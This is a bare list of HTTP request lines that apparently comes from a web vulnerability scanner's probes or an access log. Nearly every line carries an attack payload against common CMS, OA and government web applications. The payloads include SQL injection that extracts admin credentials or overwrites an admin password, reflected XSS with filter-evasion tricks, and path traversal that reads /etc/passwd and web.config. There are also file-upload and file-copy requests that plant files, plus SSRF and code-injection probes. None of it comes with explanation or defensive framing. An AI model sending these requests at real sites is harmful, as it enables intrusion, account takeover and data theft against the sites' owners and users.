GET /index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
GET /manage/WAP/Other/AddDalen.aspx?menu=add
GET /login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
GET /install/step4.aspx
HEAD /DataBase/%23zhi_rui_v_Base.mdb
GET /manage/Shop/profile/LmUserManage.aspx
GET /API/GetPageHtml.aspx
GET /stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
GET /manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
GET /msgChat/download.jsp?url=msgChat/download.jsp
GET /admin.php
GET /index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
POST /index/searchInfoTcontentByCategory.action
POST /emlib4/system/datasource/selectrecordset.aspx
POST //index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
GET /home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
GET /web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
GET /ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
GET /index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
GET /customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /module/AIP/upload.php?RUN_ID=1&T_ID=1
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
POST /index.php?m=company&s=admin/business_info_list
GET /index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
POST /getpwd4.asp
GET /?m=offer&s=offer_list&id=1-webscan%23
POST /MemberLogin.asp
GET /views.asp
GET /basket.asp?h%77_id=513%20and%201=2
GET /protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
POST /index.php?app=tag&ac=add&ts=do
GET /member/index.php?ugid31=51'%20and%20'1122'='12
GET /siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
GET /UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
GET /search.php?mod=information&ids=1-webscan&catid=1
POST /box.php?
GET /siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
GET /siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
GET //siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
GET /siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
GET /downLoadFile.action?filePath=/WEB-INF/web.xml
GET /siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
GET /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
GET /job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
GET /searchLines.aspx?LName=h%25';
GET /ProductBuy.Asp
GET /newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
GET /searchLines.aspx?LName=h&t=webscan()'
GET /viewlist.aspx?typeid=webscan()'
GET /company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
POST /resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
GET /?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
GET /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
GET /index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
GET /gallery--p,0,1122%20and%200-0---1.html
GET /?m=info.detail&id=1-webscan
GET /misc.php?mod=getuserinfo&uid=-1
POST /?m=city.getSearch&index=reer
GET /?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
GET /admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /Product.asp
POST /user/getpassword.asp
GET /admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
POST /plus/ajax_user.php?act=check_email
POST /plus/ajax_user.php?act=check_usname
GET /HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
GET /ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
GET /index.php?app=user&ac=plugin&in=../../robots.txt%00
POST /member.php?act=login&op=forget
GET /item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
GET /?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
GET /index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
GET /?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
GET /index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
GET /index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
GET /wap/index.php
GET /deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
GET /statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
GET /member/index.php
GET /wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
POST /video.php
POST /news.php?classid=2
GET /ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
GET /count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
POST /ajax.php?action=contentpage
GET /comments.php?id=3a&tablepre=boka_ckck
GET /rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
GET //wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
GET /admin/index.php?_m=../template/css/login.css%00&_a=admin_list
GET /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
GET /login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
GET /info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
POST /ajax.php?action=letter&letter=a
GET /index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
GET /index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
GET /index.php/Index/index/name/$%7B@print(md5(1122))%7D
GET /index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
POST /index.php?m=payment&s=admin/pickupmod
GET /admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
GET /user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
HEAD /servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
POST /mep-admin/DcServlet
GET /mep-admin/userAction!queryUser.action?start=0&limit=10
GET /admin/picupload.aspx
GET /manager/picupload.aspx
GET /microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
POST /TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
GET /admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
GET /index.php?c=tj&f=include&js=/../../config.php
GET /index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
GET /api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
GET /radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
GET /system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
GET /cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
GET /
GET /styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
GET /web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
GET /forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
POST /Ajax_Handle/UploadPictureHandler.ashx
POST /Ajax_Handle/UploadLocalVideoHandler.ashx
POST /index.php?m=api&a=userpreview
POST /index.php?m=Appmanager&a=loadapp
POST /CMSUploadFile.aspx
POST /api/shop.aspx
GET /sysinfo.jsp
GET /login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
GET /login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
HEAD /file/MyDownLoad.ashx?path=../web.config
GET /file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
GET /broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
GET /feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
GET /channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
GET /login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
GET /api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
HEAD /FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
GET /setup/setup1.jsp
GET /examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
GET /Article/?Type=18%20/**/and/**/1=char(106)--
GET /login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
HEAD /file/EmailDownload.ashx?url=~/web.config&name=web.config
HEAD /file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
HEAD /file/DownLoad.ashx?path=~/Routes.config
GET /file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
GET /file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
HEAD /download.jsp?path=WEB-INF/&name=web.xml
HEAD /page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
POST /mx_form/order_save.php
POST /index.php?app=tag&ac=add&ts=do
GET /member.php?act=index
GET /Article/?KeyWord=1'%20and%201=char(97)%20--
HEAD /apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
GET /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
GET /Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
GET /Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
GET /Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
GET /Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
HEAD /jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
HEAD /jiep/down.jsp?pathfile=down.jsp%00.txt
GET /index.php?m=Goods&a=showcate&id=1'cfreer
GET /Goods-showcate-id-1.html'cfreer
GET /pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
POST /jvideo/objectbox/selectx_userlist.jsp
GET /yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
GET /Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
GET /Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
GET /celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
GET /ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
GET /ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
GET /burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /oa_server/App_Pages/App_page/UserSpuerAdd.aspx
GET /oa_server/App_Pages/App_page/user_list.aspx
POST /cms/cms/site/cms_site_template_upload.jsp?action=save
GET /cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
GET /deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
GET /deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
GET /lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
POST /web/SubmitLogin.do
GET /pic.aspx?classid=60)%20and%201=char(106)%20--
GET /frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
GET /engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
GET /index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
GET /SRP2003/UserManage/sysuser/modifypage.asp?id=1
GET /venus/AsVenusCA/desk/message/reply.asp
GET /Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
POST /mx_form/order_save.php?form_id=5
